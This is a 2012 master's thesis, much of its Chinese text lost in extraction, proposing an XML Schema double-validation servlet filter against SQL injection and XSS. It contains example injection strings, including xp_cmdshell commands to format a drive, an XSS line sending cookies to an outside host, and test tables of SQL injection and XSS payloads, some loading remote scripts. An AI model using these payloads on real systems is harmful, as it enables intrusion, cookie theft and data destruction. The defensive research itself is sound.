a web application security framework based on double checking field
TRANSCRIPT
○
A Web Application Security Framework Based On Double Checking Field
Properties Of Web Pages And Database
A Thesis
Submitted to
Institute of Industrial Technology and Information Management
National Chin-Yi University of Technology
in Partial Fulfillment of the Requirements
for the Degree of
Master of Engineering
June 2012
Taiping, Taichung, Taiwan, Republic of China
〇
i
(OWASP)
2006
XML Schema
XML Schema
ii
A Web Application Security Framework Based On Double Checking
Field Properties Of Web Pages And Database
Student Sung-Yu Ho Advisor Ching-Lin Wang
Institute of Innovation Technology and Information Management
National Chin-Yi Institute of Technology
ABSTRACT
By the reports of OWASP Application Security Top 10 Risks in 2007 and 2010,
Injection and XSS were the first two risks. In this dissertation, we proposed a double
checking’s web application security framework that reference to the XML Schema
check function by Chen and Lin in 2006. In this scheme we not only check field
properties of web page but also check field properties and length of database. This
double check scheme can effectively enhance the defense ability of attack. By the result
of experiments, our scheme can offer better defense against the attacks of Injection and
XSS.
Keywords: SQL injection、XSS、Data Filter、XML Schema
iii
iv
.................................................................................................................. 1
1.1 .......................................................................................................................... 1
1.2 .......................................................................................................................... 2
1.3 .......................................................................................................................... 2
.......................................................................................................... 4
2.1 .................................................................................................................. 4
2.2 .......................................................................................................................... 5
2.3 .......................................................................................................... 7
2.4 .............................................................................................. 9
2.5 ........................................................................................................................ 10
................................................................................ 21
3.1 ........................................................................................................................ 21
3.2 ........................................................................................ 24
3.3 ........................................................................ 28
3.4 ........................................................................................ 30
.................................................................................... 32
4.1 ........................................................................................................................ 32
4.2 ........................................................................................................................ 34
4.3 ........................................................................................................................ 39
................................................................................................................ 45
5.1 ........................................................................................................................ 45
5.2 ................................................................................................................ 45
........................................................................................................................ 47
........................................................................................................................ 48
v
1 ...................................................................................................... 2
2 OWASP 2007 2010 .................... 4
3 ...................................................................... 5
4 ..................................................................... 11
5 ............................................................................ 17
6 email ............................................................. 35
7 SQL injection ......................................................... 41
8 XSS ....................................................................... 42
9 ............................................................ 44
vi
1 .......................................................................................................... 3
2 .............................................................................. 6
3 SQL ................................................................................. 6
4 .................................................................. 7
5 .......................................................... 7
6 .............................................................. 8
7 XSS ..................................................................... 8
8 XSS cookie ................................................................................ 9
9 tbUser.UserID ......................................... 9
10 UserName ................................................. 9
11 ........................................................ 9
12 .................................................................................. 10
13 .......................................................................................... 12
14 XML Schema .................................... 13
15 HTML ..................................................................................... 14
16 XML ................................................................................... 14
17 XML Schema .................................................................................. 14
18 XML Schema ......................................................... 15
19 XML Schema ......................................................... 15
20 XML Schema ................................................................. 15
21 XML Schema ......................................................... 16
22 XML Schema ..................... 16
23 XML Schema ..................................................... 16
vii
24 .............................................................. 22
25 ...................................................................................................... 23
26 GET ........................................................ 24
27 POST ...................................................... 25
28 XML PAGE.xsd ......................... 26
29 XML DB.xsd ..................... 26
30 .................................................................................................. 28
31 XML Schema ................................................. 28
32 ...................................................................................... 29
33 XML Schema ...................................................... 29
34 ...................................................................................... 31
35 ...................................................................................... 33
36 .................................................................................. 34
37 email XML Schema ................................................... 35
38 email XML Schema ............................................... 36
39 email .................................................................... 37
40 XML Datafilter.java ............................ 38
41 XML Datafilter.java .................... 38
42 XML Schema Datafilter.java ...................................... 39
43 login.jsp ................................................... 40
44 result.jsp ........................................................... 40
1
( ASP.NET
PHP JSP )
1.1
ERP MRP
[1]
OWASP 2010
[10] (Injection) (XSS)
2
1.2
OWASP
[7]
1996 1
1
1.3
1
3
1
4
2.1
(OWASP) 2
(2007 2010 )
2 OWASP 2007 2010
2007
2010
Injection 2 1
Cross-Site Scripting(XSS) 1 2
Broken Authentication and
Session Management 7 3
Insecure Direct Object
References 4 4
Cross-Site Request
Forgery(CSRF) 5 5
Security Misconfiguration -- 6
Insecure Cryptographic
Storage 8 7
Failure to Restrict URL Access URL 10 8
Insufficient Transport Layer
Protection 9 9
Unvalidated Redirects and
Forwards -- 10
5
2007
2010
Malicious File Execution 3 --
Information Leakage and
Improper Error Handling 6 --
2.2
(SQL injection) LDAP XPATH
Command
SQL
SQL
SQL
ASP ASP.net JSP PHP CGI
Perl SQL MS sqlserver Oracle
MySQL Sybase DB2 informix
[3] [5]
3
3
1
2 SELECT * FROM sys.tables
3 ALTER LOGIN sa WITH PASSWORD='xxx’
4 XSS
5 xp_cmdshell "net stop iisadmin"
IIS
6 xp_cmdshell "FORMAT C:"
6
2
SQL 3
2
//
String uid=request.getParameter("uid");
String pwd=request.getParameter("pwd");
// SQL
String SQL="select * from sys_user where uid=’"+uid+"’ and pwd=’ "+pwd+"’";
3 SQL
admin’--
abc ’--
SQL injection
SQL 4 5
7
4
// SQL
select * from sys_user where uid=’admin’--’ and pwd=’abc’
// --
select * from sys_user where uid=’admin’--’ and pwd=’abc’
5
SQL -- SQL --
admin admin
admin
2.3
[2] Wikipedia [9] (Cross-site scripting XSS)
JAVA SCRIPT VB SCRIPT HTML
<script></script> 6
7
8
6
7 XSS
JAVA SCRIPT
<script></script>
cookie
cookie
8
<script>
location.replace('http://www.hiker.com.tw/?cookie='+document.cookie)
9
</script>
8 XSS cookie
2.4
OWASP
2007
[4] 2002
9~ 12
9 tbUser.UserID
10 UserName
11
10
12
SQL injection XSS 9
MSSQL tbUser
UserID MSSQL MSSQL SQL injection
tbUser 10 UserID
UserName 11 12
2.5
1.
< <
2.
(Regular expression)
EMAIL @ @
.
:
/^[a-z\d]+(\.[a-z\d]+)*@([\da-z](-[\da-z])?)+(\.{1,2}[a-z]+)+$/
11
+ - ( )
0987-123456 -
[6] 4
4
‘’
select create update
insert drop union…
SQL
; SQL
-- SQL
< >
“” & ? tab ( )
12
/ \
%
1:%68%65%6C%6C%6F hello
2:%3CScript%3E <Script>
Non-ASCII ISO8859-1
13
//
var temp_str = filter_char (Request.QueryString("UserName"));
function filter_char (strTemp) {
strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
return strTemp;
}
13
[6] 2006
XML Schema XML Schema
XML Schema
14
13
14 XML Schema
(Filter)
(HyperText Markup Language HTML)
15 ?
XML Schema (http
request)
XML XML Schema
XSD 16 XML
XML Schema XML Schema
XML Schema 17
XML XML Schema
14
<form method="GET or POST" action="action.jsp">
姓名:<imput type="text" name="enname">
年齡:<imput type="text" name="age">
<input type="submit" name="but1" value="送出">
</form>
15 HTML
<?xml version=”1.0” encoding=”utf-8”?>
<Http xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance
xsi:noNamespaceSchemaLocation=”verification.xsd”>
<QueryString>
<enname>RICK</enname>
<age>30</age>
</QueryString>
</Http>
16 XML
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name=”age” type=”ageType”/>
</xs:schema>
17 XML Schema
XML Schema
XML Schema
(1) : string( ) 8~15 18
15
<xs:simpleType name=”ennameType”>
<xs:restriction base=”xs:string”>
<xs:minLength value=”8”/>
<xs:maxLength value=”15”/>
</xs:restriction>
</xs:simpleType>
18 XML Schema
(2) :int( ) 0~100 19
<xs:simpleType name=”ageType”>
<xs:restriction base=”xs:int”>
<xs:minInclusive value=”0”/>
<xs:maxInclusive value=”100”/>
</xs:restriction>
</xs:simpleType>
19 XML Schema
(3) : string( ) VISA MASTER JCB 20
<xs:simpleType name=”ccardType”>
<xs:restriction base=”xs:string”>
<xs:enumeration value=”VISA”/>
<xs:enumeration value=”MASTER”/>
<xs:enumeration value=”JCB”/>
</xs:restriction>
</xs:simpleType>
20 XML Schema
(4) : string( ) (Regular Expression) 21
16
<xs:simpleType name=”IDType”>
<xs:restriction base=”xs:string”>
<xs:pattern value=”[A-Z]\d{9}”/>
</xs:restriction>
</xs:simpleType>
21 XML Schema
(5) : string( ) 22
<xs:simpleType name=”nameType”>
<xs:restriction base=”xs:string”>
<xs: pattern value=”[^’”,<>%]”/>
</xs:restriction>
</xs:simpleType>
22 XML Schema
(6) : int( ) 23
<xs:complexType name=”priceType”>
<xs:simpleContent>
<xs:extension base=”xs:int”>
<xs:attribute name=”MAC” type=”macType” use=”required”/>
</xs:extension>
</xs:simpleContent >
</xs:complexType >
23 XML Schema
XML Schema
17
0~9
String( ) int( ) [A-Z]\d{9}
Wikipedia [11] 5
5
\
n n \n
\\ \ \( (
^ RegExp Multiline
^ \n \r
$ RegExp Multiline
$ \n \r
* zo* z zoo
* {0,}
+ zo+ zo
zoo z + {1,}
? do(es)? does
does do ? {0,1}
{n} n n o{2} Bob
o food o
{n,} n n o{2,} Bob
o foooood o o{1,} o+
18
o{0,} o*
{n,m} m n n<=m n m
o{1,3} fooooood o o{0,1}
o?
? *,+,? {n} {n,} {n,m}
oooo o+? o o+
o
. \n \n
(.|\n)
(pattern) pattern Matches
VBScript SubMatches JScript
$0…$9 \( \)
(?:pattern) pattern
(|)
industr(?:y|ies)
industry|industries
(?=pattern) pattern
Windows(?=95|98|NT|2000) Windows2000
Windows Windows3.1 Windows
(?!pattern) pattern
Windows(?!95|98|NT|2000) Windows3.1
Windows Windows2000 Windows
19
(?<=pattern)
(?<=95|98|NT|2000)Windows 2000Windows
Windows 3.1Windows Windows
(?<!pattern)
(?<!95|98|NT|2000)Windows 3.1Windows
Windows 2000Windows Windows
x|y x y z|food z food (z|f)ood
zood food
[xyz] [abc]
plain a
[^xyz] [^abc]
plain p
[a-z] [a-z]
a z
[^a-z]
[^a-z] a z
\b er\b
never er verb er
\B er\B verb er
never er
\cx x \cM Control-M
x A-Z a-z c c
\d [0-9]
\D [^0-9]
\f \x0c \cL
20
\n \x0a \cJ
\r \x0d \cM
\s
[ \f\n\r\t\v]
\S [^ \f\n\r\t\v]
\t \x09 \cI
\v \x0b \cK
\w [A-Za-z0-9_]
\W [^A-Za-z0-9_]
\xn n n
\x41 A \x041 \x04&1
ASCII .
\num num num
(.)\1
\n \n n
n n 0-7
n
\nm \nm nm
nm \nm n
n m
n m 0-7 \nm
nm
\nml n 0-3 m l 0-7
nml
\un n n Unicode
\u00A9 ©
21
(SA) (SD)
(PG)
40
50
/^[a-z\d]+(\.[a-z\d]+)*@([\da-z](-[\da-z])?)+(\.{1,2}[a-z]+)+$/
. {15,50} ( 15~50 )
15~50
3.1
24
22
24
(Data Filter)
Apache
Filter IIS ISAPI Filter
[6] 2006
XML Schema XML Schema
( )
( )
:
23
25
25
XML Schema
XML Schema
XML
24
Schema SQL XML
Schema
3.2
GET POST
(Headers) HTTP Request
26 27 (request)
//表單 GET方法,HTML語言
<form method="get">
<input type="text" name="enname"/>
<input type="submit"/>
</form>
//表頭資訊與 HTTP Request物件內容
GET /?enname=Rick HTTP/1.1
Host: www.test.com.tw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.13)
Gecko/20120507 Firefox/3.7.15 GTB7.1 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-tw,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: UTF-8,*
Keep-Alive: 115
Connection: keep-alive
26 GET
25
//表單 POST方法,HTML語言
<form method="post">
<input type="text" name="enname"/>
<input type="submit"/>
</form>
//表頭資訊與 HTTP Request物件內容
POST / HTTP/1.1
Host: www.test.com.tw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.13)
Gecko/20120507 Firefox/3.7.15 GTB7.1 ( .NET CLR 3.5.30729)
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-tw,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: UTF-8,*
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
enname=Rick
27 POST
(request)
enname Rick
XML
XML XML Schema
XML Schema
XML Schema 28 29 XML XML
26
Schema
XML Schema
<?xml version=”1.0” encoding=”utf-8”?>
<Http xmlns:xsi=”http://www.w3.org/2001/XMLSchema-
instance” xsi:noNamespaceSchemaLocation=”PAGE.xsd”>
<QueryString>
<enname>RICK</enname>
<age>30</age>
</QueryString>
</Http>
28 XML PAGE.xsd
<?xml version=”1.0” encoding=”utf-8”?>
<Http xmlns:xsi=”http://www.w3.org/2001/XMLSchema-
instance” xsi:noNamespaceSchemaLocation=”DB.xsd”>
<QueryString>
<enname>RICK</enname>
<age>30</age>
</QueryString>
</Http>
29 XML DB.xsd
XML XML
XML Schema
XML Schema( .xsd)
XML Schema
27
XML Schema XML
Schema JAVA XML XML Schema
30
// XML Schema
import javax.xml.transform.Source;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
// XML Schema
//1.
SchemaFactory schemaFactory=
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
//2. XML Schema
File schemaFile=new File(xsdpath);
// 3.
Schema schema=schemaFactory.newSchema(schemaFile);
Validator validator=schema.newValidator();
//4. XML
Source source=new StreamSource(new
java.io.StringReader(xmlpath.toString()));
try{
//5.
validator.validate(source);
System.out.println("通過驗證");
flag=true;
}catch(Exception ex){
System.out.println("無法通過驗證");
ex.printStackTrace();
28
flag=false;
}
30
XML Schema XML javax.xml
XML XML Schema 1
2 XML Schema 3
4 XML 5 validate
3.3
( )
XML Schema 31 XML
Schema
<xs:simpleType name="emailType">
<xs:restriction base="xs:string">
<xs:pattern value=".{15,50}"/><!-- 15~50 -->
</xs:restriction>
</xs:simpleType>
31 XML Schema
XML
Schema XML Schema
XML Schema
(table schema)
29
32
32
XML Schema
: (string)
(digital) (date) XML Schema
33
<xs:simpleType name="emailType">
<xs:restriction base="xs:string">
<xs:minLength value="1"/><!-- 1 -->
<xs:maxLength value="40"/><!-- 40 -->
</xs:restriction>
</xs:simpleType>
33 XML Schema
30
XML Schema XML
Schema
(table layout)
3.4
XML Schema
34
31
34
32
4.1
2.1
GHz 2G byte Windows XP MySQL
Tomcat Eclipse JAVA JSP XML XML Schema HTML
[8] Ha.ckers.org[13][14]
SQL injection XSS 7 8
XML Schema XML Schema
35
33
35
34
4.2
JSP (login.jsp) (filter.jsp)
(result.jsp) XML
XML Schema
36
36
email email
15~50
PAGE.xsd email 15 50 XML
Schema 37
<?xml version="1.0" encoding="UTF-8"?>
INPUT
login.jsp
PROCESS
Datafilter.java
XML
XML Schema
PAGE.xsd
XML
XML Schema
DB.xsd
OUTPUT
result.jsp
35
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:simpleType name="emailType">
<xs:restriction base="xs:string">
<xs:pattern value=".{15,50}"/><!--定義15~50個字元-->
</xs:restriction>
</xs:simpleType>
<xs:element name="qry">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="qrystr">
<xs:complexType>
<xs:sequence>
<xs:element name="email" type="emailType"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:schema>
37 email XML Schema
email (Table
Schema) 6 varchar 40
DB.xsd 1 40
XML Schema 38
6 email
( ) NULL
email VARCHAR(40) N
36
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:simpleType name="emailType">
<xs:restriction base="xs:string">
<xs:minLength value="1"/><!--定義最小1個字元-->
<xs:maxLength value="40"/><!--定義最大40個字元-->
</xs:restriction>
</xs:simpleType>
<xs:element name="qry">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="qrystr">
<xs:complexType>
<xs:sequence>
<xs:element name="email" type="emailType"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:schema>
38 email XML Schema
15~50
1~40
15~40 39
37
39 email
(Datafilter.java)
XML XML <
> 40 XML Schema
XML 41
XML XML Schema
42
//將請求的變數串成XML格式
StringBuffer xml_qry = new StringBuffer("");
xml_qry.setLength(0);
while(enu.hasMoreElements()){
String name=(String)enu.nextElement();
String[] canshu=req.getParameterValues(name);
for(int i=0;i<canshu.length;i++){
String val_canshu=canshu[i];
val_canshu=val_canshu.replaceAll(">", ">"); //轉碼
val_canshu=val_canshu.replaceAll("<", "<"); //轉碼
xml_qry.append("<"+name+">"+val_canshu+"</"+name+">");//請求變數
}
15 50
1 40
15 40
38
}
40 XML Datafilter.java
//產生網頁欄位屬性XML
String xsd_a="PAGE.xsd"; //指定XML Schema檔
StringBuffer xml_a = new StringBuffer("");
xml_a.setLength(0);
xml_a.append("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
xml_a.append("<qry
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:noNamespaceSchemaLocation=\""+xsd_a+"\">");
xml_a.append("<qrystr>");
xml_a.append(xml_qry); //請求變數組合成XML
xml_a.append("</qrystr>");
xml_a.append("</qry>");
//產生資料庫欄位屬性XML
String xsd_b="DB.xsd"; //指定XML Schema檔
StringBuffer xml_b = new StringBuffer("");
xml_b.setLength(0);
xml_b.append("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
xml_b.append("<qry
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:noNamespaceSchemaLocation=\""+xsd_b+"\">");
xml_b.append("<qrystr>");
xml_b.append(xml_qry); //請求變數組合成XML
xml_b.append("</qrystr>");
xml_b.append("</qry>");
41 XML Datafilter.java
39
//執行驗證
SchemaFactory schemaFactory=
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
File schemaFile=new File(xsdpath);
Schema schema=schemaFactory.newSchema(schemaFile);
Validator validator=schema.newValidator();
Source source=
new StreamSource(new java.io.StringReader(xmlpath.toString() ));
try{
validator.validate(source); //執行驗證
System.out.println("通過驗證");
}catch(Exception ex){
System.out.println("無法通過驗證");
ex.printStackTrace();
}
42 XML Schema Datafilter.java
4.3
SQL injection XSS 43
44
15~50
1~40
7 8
40
43 login.jsp
44 result.jsp
41
7 SQL injection
( )
1 1 OR 1=1 -- 31
2 1' OR '1'='1 -- 31
3 1'1 -- 16
4 1 EXEC SP_ (or EXEC XP_) 31
5 1 AND 1=1 -- 31
6 1' AND 1=(SELECT COUNT(*) FROM
tablenames); --
31
7 1 AND USER_NAME() = 'dbo' 15
8 \'; DESC users; -- 31
9 1\'1 -- 31
10 1' AND non_existant_table = '1 16
11 ' OR username IS NOT NULL OR username
= '
32
12 1 AND
ASCII(LOWER(SUBSTRING((SELECT TOP
1 name FROM sysobjects WHERE
xtype='U'), 1, 1))) > 116
-- 31
13 1 UNION ALL SELECT 1,2,3,4,5,6,name
FROM sysObjects WHERE xtype = 'U' --
-- 31
14 1 UNI/**/ON SELECT ALL FROM WHERE 16
42
8 XSS
( )
1 <SCRIPT
SRC=http://ha.ckers.org/xss.js></S
CRIPT>
31
2 <IMG
SRC="javascript:alert('XSS');">
16
3 <IMG
SRC="jav	ascript:alert('XSS')
;">
16
4 <IMG SRC=" 
javascript:alert('XSS');">
-- 31
5 <SCRIPT/XSS
SRC="http://ha.ckers.org/xss.js"><
/SCRIPT>
-- 31
6 <BODY
onload!#$%&()*~+-_.,:;?@[/|\]^`=al
ert("XSS")>
-- 16
7 <<SCRIPT>alert("XSS");//<</SCRIPT> 15
8 <iframe
src=http://ha.ckers.org/scriptlet.
html <
15
9 <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');">
-- 31
10 <BODY ONLOAD=alert('XSS')> 15
11 <IMG
DYNSRC="javascript:alert('XSS')">
16
12 <BR SIZE="&{alert('XSS')}"> -- 16
43
( )
13 <LINK REL="stylesheet"
HREF="javascript:alert('XSS');">
-- 16
14 <XSS STYLE="behavior:
url(xss.htc);">
16
15 <TABLE
BACKGROUND="javascript:alert('XSS'
)">
31
16 <TABLE><TD
BACKGROUND="javascript:alert('XSS'
)">
31
17 <STYLE
TYPE="text/javascript">alert('XSS'
);</STYLE>
-- 32
18 <BASE
HREF="javascript:alert('XSS');//">
16
( )
9 32 18
56.25%
12 37.5%
( ) (
) 18.75%
44
9
( )
32 18 56.25%
32 12 37.5%
15~31 24
45
SQL injection XSS
5.1
SQL Injection XSS
5.2
56.25% 37.5%
18.75%
46
(APP)
47
1. ” ” 2012
2. ” XSS ”
127-144 2010
3. ” SQL Injection ”
2008 18 8 2011 39-45
4. ”SQL Injection ( ) SQL ” 2002
[Online].Available:
http://www.microsoft.com/taiwan/sql/sql_injection_g1.htm(January 2, 2012).
5. ” SQL Injection ”
2010
6. ” XML ”
33-53 2006
7. ” ” 1996 22
8. ” ”
2009
9. Cross-site scripting. (2011). Wikipedia. [Online].Available:
http://en.wikipedia.org/wiki/Cross-site_scripting (January 14, 2012).
10. The ten most critical web application security risks. (2007 2010). The Open Web
Application Security Project. [Online].Available: https://www.owasp.org (January
3, 2012).
11. Regular Expression. (2011). Wikipedia. [Online].Available:
http://zh.wikipedia.org/wiki/Regular_Expression (January 17, 2012).
12. SQL injection. (2011). Wikipedia. [Online].Available:
http://en.wikipedia.org/wiki/Sql_injection (January 3, 2012).
13. SQL injection attack syntax list. (2006). Ha.ckers.org web application security.
[Online].Available: http://ha.ckers.org/sqlinjection/ (January 2, 2012).
14. XSS attack syntax list. (2008). Ha.ckers.org web application security.
[Online].Available: http://ha.ckers.org/xss.html (January 2, 2012).
48
DataFilter.java
package comm.filter;
import java.io.*;
import java.util.Enumeration;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.xml.transform.Source;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.SAXException;
public class DataFilter implements Filter {
protected String encoding = null;
private long filter_time_s = 0; //驗證開始執行時間
private long filter_time_e = 0; //驗證結束執行時間
private long filter_time = 0; //驗證執行時間
private String filter_a=""; //a的驗證結果("":沒有執行,"Y":無法通過驗證,"N":通過驗證)
private String filter_b=""; //b的驗證結果("":沒有執行,"Y":無法通過驗證,"N":通過驗證)
public void init(FilterConfig config) throws ServletException {
if(config.getInitParameter("encoding")!=null)
this.encoding = config.getInitParameter("encoding");
}
public void destroy() {}
public void doFilter(ServletRequest request, ServletResponse response, FilterChain
chain) throws IOException, ServletException {
boolean flag=true;
request.setCharacterEncoding(encoding);
HttpServletRequest req = (HttpServletRequest)request;
HttpServletResponse res = (HttpServletResponse)response;
String now_url = req.getRequestURI().toLowerCase(); //目前的頁面的url
if(!"/dbfilter/login.jsp".equals(now_url) ){ //login.jsp頁面不用過濾
if(!checkDate(req,res)){//驗證資料失敗
flag=false;
int serPort = req.getServerPort();
String urlStr = "http://"+req.getServerName();
if(serPort!=80) urlStr += ":"+serPort;
urlStr += req.getContextPath();
urlStr +=
"/login.jsp?filter_time="+filter_time+"&filter_a="+filter_a+"&filter_b="+filter_b;
res.sendRedirect(urlStr);
}
}
if(flag) chain.doFilter(request, response);
}
private boolean checkDate(HttpServletRequest req,HttpServletResponse res){
49
boolean flag=true;
//驗證開始時間
filter_time_s = System.currentTimeMillis();
Enumeration<?> enu=req.getParameterNames();//取得所有請求變數
StringBuffer xml_qry = new StringBuffer("");
xml_qry.setLength(0);
while(enu.hasMoreElements()){ //將請求的變數,串成XML格式
String name=(String)enu.nextElement();
String[] canshu=req.getParameterValues(name);
for(int i=0;i<canshu.length;i++){
String val_canshu=canshu[i];
val_canshu=val_canshu.replaceAll(">", ">");
val_canshu=val_canshu.replaceAll("<", "<");
xml_qry.append("<"+name+">"+val_canshu+"</"+name+">");
}
}
//(A)產生網頁欄位屬性XML檔
String xsd_a="PAGE.xsd"; //指定XML Schema檔
StringBuffer xml_a = new StringBuffer("");
xml_a.setLength(0);
xml_a.append("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
xml_a.append("<qry xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:noNamespaceSchemaLocation=\""+xsd_a+"\">");
xml_a.append("<qrystr>");
xml_a.append(xml_qry);
xml_a.append("</qrystr>");
xml_a.append("</qry>");
//(B)產生資料庫欄位屬性XML檔
String xsd_b="DB.xsd"; //指定XML Schema檔
StringBuffer xml_b = new StringBuffer("");
xml_b.setLength(0);
xml_b.append("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
xml_b.append("<qry xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:noNamespaceSchemaLocation=\""+xsd_b+"\">");
xml_b.append("<qrystr>");
xml_b.append(xml_qry);
xml_b.append("</qrystr>");
xml_b.append("</qry>");
//讀取XSD_A檔,進行驗證
try{
String xsd_a_Path =
req.getSession().getServletContext().getRealPath("")+"/"+xsd_a;
flag=this.Validatexml(xml_a,xsd_a_Path);
//驗證結束時間
filter_time_e = System.currentTimeMillis();
filter_time = filter_time_e - filter_time_s; //毫秒
if(flag){ //無法通過驗證
filter_a="Y";
filter_b="";
50
req.setAttribute( "filter_time",filter_time);
req.setAttribute( "filter_a",filter_a);
req.setAttribute( "filter_b","");
}else{ //通過驗證
filter_a="N";
filter_b="";
}
}catch(Exception ex){ex.printStackTrace();}
if(flag){
//讀取XSD_B檔,進行驗證
try{
String xsd_b_Path =
req.getSession().getServletContext().getRealPath("")+"/"+xsd_b;
flag=this.Validatexml(xml_b,xsd_b_Path);
//驗證結束時間
filter_time_e = System.currentTimeMillis();
filter_time = filter_time_e - filter_time_s; //毫秒
if(flag){ //無法通過驗證
filter_b="Y";
req.setAttribute( "filter_time",filter_time);
req.setAttribute( "filter_b",filter_b);
}else{ //通過驗證
filter_b="N";
}
}catch(Exception ex){ex.printStackTrace();}
}
return flag;
}
public boolean Validatexml(StringBuffer xmlpath,String xsdpath) throws
SAXException,IOException{
boolean flag=true;
SchemaFactory
schemaFactory=SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
File schemaFile=new File(xsdpath);
Schema schema=schemaFactory.newSchema(schemaFile);
Validator validator=schema.newValidator();
Source source=new StreamSource(new java.io.StringReader(xmlpath.toString()));
try{
validator.validate(source);
System.out.println("通過驗證");
flag=true;
}catch(Exception ex){
System.out.println("無法通過驗證");
ex.printStackTrace();
flag=false;
}
return flag;
}
}